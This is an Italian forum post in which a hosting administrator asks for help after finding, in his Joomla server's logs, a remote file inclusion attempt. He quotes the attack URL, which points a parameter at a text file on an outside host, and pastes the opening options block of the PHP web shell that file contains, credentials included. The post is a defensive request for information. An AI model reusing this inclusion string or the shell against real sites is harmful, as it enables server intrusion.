stringa "particolare"

[INVY]

Ciao,
non so se questa è la sezione del forum più adatta, ma tra quelle che ho visto penso si avvicini di più (scusate se sbaglio).
Mi "diverto" a volte nello spulciare i log generati dai miei server e oggi ho trovato una stringa molto particolare su un sito in Joomla da me ospitato e volevo sottoporlo a voi.
Si tratta di un tentativo di attacco al portale, che pare non abbia sortito nessun effetto.
La stringa è questa: http://www.NomeDominio.xx/index.php?foing_root_path=http://NomeDominio.biz/suntik.txt?

Se si digita da solo http://NomeDominio.biz/suntik.txt si apre un file di testo (con una parte crittografata) che contiene ovviamente un "qualcosa" che può essere utile per un hacker.

Ecco l'inizio(con il classico simbolo

<?php
/***********************************************/
/*
/*                 #    #        #    #                             
/*                 #   #          #   #
/*                #    #          #    #
/*                #   ##   ####   ##   #
/*                ##   ##  ######  ##   ##
/*                ##   ##  ######  ##   ##
/*                ##   ##   ####   ##   ##
/*                ###   ############   ###
/*                ########################
/*                      ##############
/*               ######## ########## #######
/*              ###   ##  ##########  ##   ###
/*              ###   ##  ##########  ##   ###
/*               ###   #  ##########  #   ###
/*               ###   ##  ########  ##   ###
/*                ##    #   ######   #    ##
/*                 ##   #    ####   #    ##
/*                  ##                 ##
/*  Simpen pake exstensi .php
/*  http://data.or.id, http://hdteam.or.id
/*  persi: 1.24 (taun baru Edition)
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/*  edited by b4d_m00d
/*  http://data.or.id, http://hdteam.or.id
/*  High Definition Team
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/*  Dedemit Maya choy
/************************************************/
/* ~~~  Options  ~~~ */

//  bahasa
// $language='jo' - jowo (keren = kethek leren)
// $language='eng' - english (londoooooo)
$language='jo';

//  Authentification
// $auth = 1; -  ( authentification = On  )
// $auth = 0; -  ( authentification = Off )
$auth = 0;

//  (Login & Password for access)
// (CHANGE THIS!!!)
$name='hdteam'; //  (user login)
$pass='keren'; //  (user password)

eccettera..
. Insomma, una bella shell per girare dentro il sito.

Ho controllato tutto il server ma no ho trovato nulla di anomalo. Tra l'altro, ricopiando tutto il file di testo e salvandolo come file .php l'antivirus lo rileva e lo mette in quarantena.

Qualcuno di voi ha qualche informazione su questo tentativo di intrusione?

Separatamente, ai moderatori del forum, posso inviare per email il nome del sito dove c'è questa shell

Spero di non essere stato inopportuno.
Grazie e buona navigazione